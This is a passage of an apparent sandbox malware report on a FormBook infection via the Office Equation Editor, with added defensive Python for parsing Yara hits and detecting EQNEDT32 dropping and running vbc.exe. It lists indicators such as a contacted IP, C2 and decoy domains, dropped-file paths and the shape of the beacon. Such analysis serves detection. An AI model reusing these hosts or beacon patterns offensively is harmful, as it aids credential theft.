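                    "trashwasher.com", "franquiciasexclusivas.tienda", "digipoint-entertainment.com"]}

if __name__ == "__main__":
    print(flag_download(parse_http(DOWNLOAD_REQUEST), parse_http(DOWNLOAD_RESPONSE)))
    print(is_formbook_checkin(parse_http(CHECKIN_REQUEST)))
    print(classify_hosts(CONFIG, ["www.deboraverdian.com", "www.septemberstockevent200.com"]))
```

The beacon check deliberately does not key on the /ht08/ path or the br2 / fDKD5Z parameter names, which change per build; the stable parts are the shape (short directory, two parameters, one of them a long base64 blob), the missing User-Agent and the Connection: close on a GET that carries a body. The host classification is what tells an analyst that a run which only touched decoy domains still leaked nothing to the operator.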
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AUTOMATTICUS
Source: Joe Sandbox View ASN Name: PLUSSERVER-ASN1DE
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.0.78.25
Source: Joe Sandbox View IP Address: 151.101.66.159
Source: explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.466458025.0000000004D30000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.500073049.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.463350952.000000000223F000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: schtasks.exe, 00000007.00000002.457769626.0000000000830000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.476194780.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.466458025.0000000004D30000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.500073049.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.661607475.00000000042B0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 0000000A.00000000.500985342.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 0000000A.00000000.470694793.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 0000000A.00000000.485622386.0000000006A09000.00000004.00000001.sdmp String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 0000000A.00000000.472240765.00000000083F6000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.476818163.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.484209612.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.484143335.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.476939391.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.506021303.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.506224485.00000000044E7000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000A.00000000.472240765.00000000083F6000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.476818163.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.484143335.000000000447A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.506021303.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 0000000A.00000000.474173559.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.499784480.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.466037172.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A725389E.emf
Source: unknown DNS traffic detected: queries for: www.noyoucantridemyonewheel.com
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Thu, 25 Nov 2021 18:27:53 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "6192576d-113" | Via: 1.1 google | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133 (50 connections)
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY
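The source names in the list above encode where each FormBook match was taken from: `.sdmp` names carry the process id, a stage marker, the region base, the Windows page protection and a region-type code, all in hex; `.unpack` names carry the process id, stage, image name, base and dump index, with `.raw` marking the untouched memory image. The following parser is an added example, not part of the report or of Joe Sandbox, that decodes both forms and groups the hits by process. The PID-to-image mapping is read off this report's own lines (4_2_/9_2_ functions belong to vbc.exe, 12_2_ to svchost.exe, 0000000A is named as explorer.exe); the meaning of the stage field (0 at process start, 2 at the end of the run) and of the final region-type field are assumptions and are marked as such in the code.

```python
import re
from collections import defaultdict

# Windows PAGE_* protection constants (winnt.h); an .sdmp name carries one of them.
PAGE_PROTECTION = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}

# PID -> image, taken from this report's own lines. Built here; not a field of the dump name.
PROCESS_NAMES = {4: "vbc.exe", 9: "vbc.exe", 10: "explorer.exe", 12: "svchost.exe"}

# <pid>.<stage>.<counter>.<base>.<protect>.<type>.sdmp   (hex fields, counter decimal)
SDMP_RE = re.compile(
    r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$",
    re.I,
)
# <pid>.<stage>.<image>.<base>.<index>[.raw].unpack   (pid/stage/index decimal, base hex)
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9A-F]+)\.(\d+)(\.raw)?\.unpack$", re.I)


def parse_hit(name):
    """Decode one Yara hit source name into a dict, or return None if it is neither form."""
    m = SDMP_RE.match(name)
    if m:
        pid, stage, _counter, base, protect, region_type = m.groups()
        prot = int(protect, 16)
        return {
            "kind": "memory",
            "pid": int(pid, 16),
            "process": PROCESS_NAMES.get(int(pid, 16), "?"),
            "stage": int(stage, 16),              # assumption: 0 = dumped at start, 2 = at end of run
            "base": int(base, 16),
            "protect": PAGE_PROTECTION.get(prot, hex(prot)),
            "executable": bool(prot & 0xF0),      # PAGE_EXECUTE* values occupy the high nibble
            "region_type": int(region_type, 16),  # assumption: the sandbox's own region-type code
        }
    m = UNPACK_RE.match(name)
    if m:
        pid, stage, image, base, index, raw = m.groups()
        return {
            "kind": "unpacked_pe",
            "pid": int(pid),
            "process": PROCESS_NAMES.get(int(pid), image),
            "stage": int(stage),
            "image": image,
            "base": int(base, 16),
            "index": int(index),
            "raw": raw is not None,               # assumption: .raw = memory image as dumped
        }
    return None


def executable_regions(names):
    """Map pid -> sorted bases of memory dumps that matched while mapped executable."""
    regions = defaultdict(set)
    for name in names:
        hit = parse_hit(name)
        if hit and hit["kind"] == "memory" and hit["executable"]:
            regions[hit["pid"]].add(hit["base"])
    return {pid: sorted(bases) for pid, bases in regions.items()}


def describe(name):
    """One human-readable line per hit, for a triage note."""
    hit = parse_hit(name)
    if hit is None:
        return f"{name}: unrecognised"
    head = f"pid {hit['pid']} ({hit['process']}) stage {hit['stage']} base {hit['base']:#x}"
    if hit["kind"] == "memory":
        return f"{head} {hit['protect']}"
    return f"{head} unpacked PE #{hit['index']}{' raw' if hit['raw'] else ''}"


# Hit sources copied from the "Yara detected FormBook" list above.
HITS = [
    "9.0.vbc.exe.400000.9.unpack",
    "9.2.vbc.exe.400000.1.raw.unpack",
    "0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp",
    "00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp",
    "00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp",
    "0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp",
    "0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp",
    "00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp",
    "00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp",
    "0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp",
    "00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp",
]

if __name__ == "__main__":
    for h in HITS:
        print(describe(h))
    print(executable_regions(HITS))
```

Run over the list it reports the payload as RWX at 0x400000, 0xF0000 and 0x210000 in vbc.exe (PID 9), at 0x80000 and 0x170000 in svchost.exe (PID 12) and at 0x9780000 in explorer.exe (PID 10); the only non-executable hits are the PAGE_READWRITE regions in PID 4 (the first vbc.exe instance holding the decoded payload in heap) and at 0x1D0000 in PID 12.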

System Summary:

Malicious sample detected (through community Yara rule)
Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
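The two file-creation events above are the whole delivery chain in miniature: the Equation Editor writes the downloaded executable into the WinINet cache (Content.IE5 is where URLDownloadToFile lands files) and then to C:\Users\Public, from where it is started. The following detection is an added example, not part of the report or of any sandbox signature, that runs the same checks over Sysmon-style events: Event ID 11 (FileCreate) and Event ID 1 (ProcessCreate). The events are constructed here from the paths in this report, with one benign Excel event of each kind added as noise; the Office install path used for the noise is assumed.

```python
# Constructed Sysmon-style events modelled on the paths in this report (not exported
# sandbox data). EventID 11 = FileCreate, EventID 1 = ProcessCreate.
EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"   # assumed install path

EVENTS = [
    {"EventID": 11, "Image": EQNEDT32,
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe"},
    {"EventID": 11, "Image": EQNEDT32, "TargetFilename": r"C:\Users\Public\vbc.exe"},
    {"EventID": 1, "Image": r"C:\Users\Public\vbc.exe", "ParentImage": EQNEDT32,
     "CommandLine": r"C:\Users\Public\vbc.exe"},
    # benign noise the rules must ignore: Excel writing a temp file, Explorer starting Excel
    {"EventID": 11, "Image": EXCEL, "TargetFilename": r"C:\Users\user\AppData\Local\Temp\~DF1A2B.tmp"},
    {"EventID": 1, "Image": EXCEL, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"EXCEL.EXE" "PROFORMA INVOICE.xlsx"'},
]

PE_EXTENSIONS = (".exe", ".dll", ".scr", ".cpl", ".com")


def is_image(path, basename):
    """Case-insensitive match on the file name at the end of a Windows path."""
    return path.lower().endswith("\\" + basename.lower())


def evaluate(events):
    """Apply the four checks to every event; return (rule name, event index) pairs in order."""
    alerts = []
    for i, ev in enumerate(events):
        if ev["EventID"] == 11 and is_image(ev["Image"], "EQNEDT32.EXE"):
            target = ev["TargetFilename"].lower()
            # The extension check stands in for the sandbox's PE-header inspection; a real
            # rule should also hash the file, since a downloader may use any extension.
            if target.endswith(PE_EXTENSIONS):
                alerts.append(("eqnedt32_drops_pe", i))
            # Content.IE5 is the WinINet cache: a file created there by a non-browser
            # process was fetched over HTTP (URLDownloadToFile), not written locally.
            if "\\content.ie5\\" in target:
                alerts.append(("eqnedt32_downloads_to_inet_cache", i))
        elif ev["EventID"] == 1:
            # The Equation Editor has no legitimate reason to start a child process.
            if is_image(ev["ParentImage"], "EQNEDT32.EXE"):
                alerts.append(("eqnedt32_spawns_process", i))
            if ev["Image"].lower().startswith("c:\\users\\public\\"):
                alerts.append(("exec_from_users_public", i))
    return alerts


if __name__ == "__main__":
    for rule, idx in evaluate(EVENTS):
        print(f"{rule:34} {EVENTS[idx].get('TargetFilename') or EVENTS[idx]['Image']}")
```

The child-process check is the strongest of the four on its own: EQNEDT32.EXE is a COM server that renders equations and never spawns anything, so any child under it is worth an alert regardless of the path, which is the same logic as the report's "Office equation editor starts processes" signature.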
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E6310 4_2_001E6310
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E6300 4_2_001E6300
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E1DE0 4_2_001E1DE0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00401030 9_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041C130 9_2_0041C130
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041C9A5 9_2_0041C9A5
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041BABE 9_2_0041BABE
Source: C:\Users\Public\vbc.exe Code function: 9_2_00408C7B 9_2_00408C7B
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041C4E6 9_2_0041C4E6
Source: C:\Users\Public\vbc.exe Code function: 9_2_00408C80 9_2_00408C80
Source: C:\Users\Public\vbc.exe Code function: 9_2_00402D87 9_2_00402D87
Source: C:\Users\Public\vbc.exe Code function: 9_2_00402D90 9_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 9_2_00402FB0 9_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C5E0C6 9_2_00C5E0C6
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C63040 9_2_00C63040
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C7905A 9_2_00C7905A
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CDD06D 9_2_00CDD06D
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C8D005 9_2_00C8D005
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CED13F 9_2_00CED13F
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C5E2E9 9_2_00C5E2E9
Source: C:\Users\Public\vbc.exe Code function: 9_2_00D01238 9_2_00D01238
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C5F3CF 9_2_00C5F3CF
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C863DB 9_2_00C863DB
Source: C:\Users\Public\vbc.exe Code function: 9_2_00D063BF 9_2_00D063BF
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C67353 9_2_00C67353
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CAA37B 9_2_00CAA37B
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C62305 9_2_00C62305
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C95485 9_2_00C95485
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C71489 9_2_00C71489
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C9D47D 9_2_00C9D47D
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CE443E 9_2_00CE443E
Source: C:\Users\Public\vbc.exe Code function: 9_2_00D035DA 9_2_00D035DA
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CE05E3 9_2_00CE05E3
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C7C5F0 9_2_00C7C5F0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CA6540 9_2_00CA6540
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C6351F 9_2_00C6351F
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C6E6C1 9_2_00C6E6C1
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C64680 9_2_00C64680
Source: C:\Users\Public\vbc.exe Code function: 9_2_00D02622 9_2_00D02622
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CAA634 9_2_00CAA634
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C957C3 9_2_00C957C3
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CE579A 9_2_00CE579A
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C6C7BC 9_2_00C6C7BC
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CF771D 9_2_00CF771D
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CDF8C4 9_2_00CDF8C4
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CFF8EE 9_2_00CFF8EE
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C6C85C 9_2_00C6C85C
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C8286D 9_2_00C8286D
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C769FE 9_2_00C769FE
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CF49F5 9_2_00CF49F5
Source: C:\Users\Public\vbc.exe Code function: 9_2_00D0098E 9_2_00D0098E
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C629B2 9_2_00C629B2
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CE394B 9_2_00CE394B
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CE5955 9_2_00CE5955
Source: C:\Users\Public\vbc.exe Code function: 9_2_00D13A83 9_2_00D13A83
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CE6BCB 9_2_00CE6BCB
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C5FBD7 9_2_00C5FBD7
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CEDBDA 9_2_00CEDBDA
Source: C:\Users\Public\vbc.exe Code function: 9_2_00D0CBA4 9_2_00D0CBA4
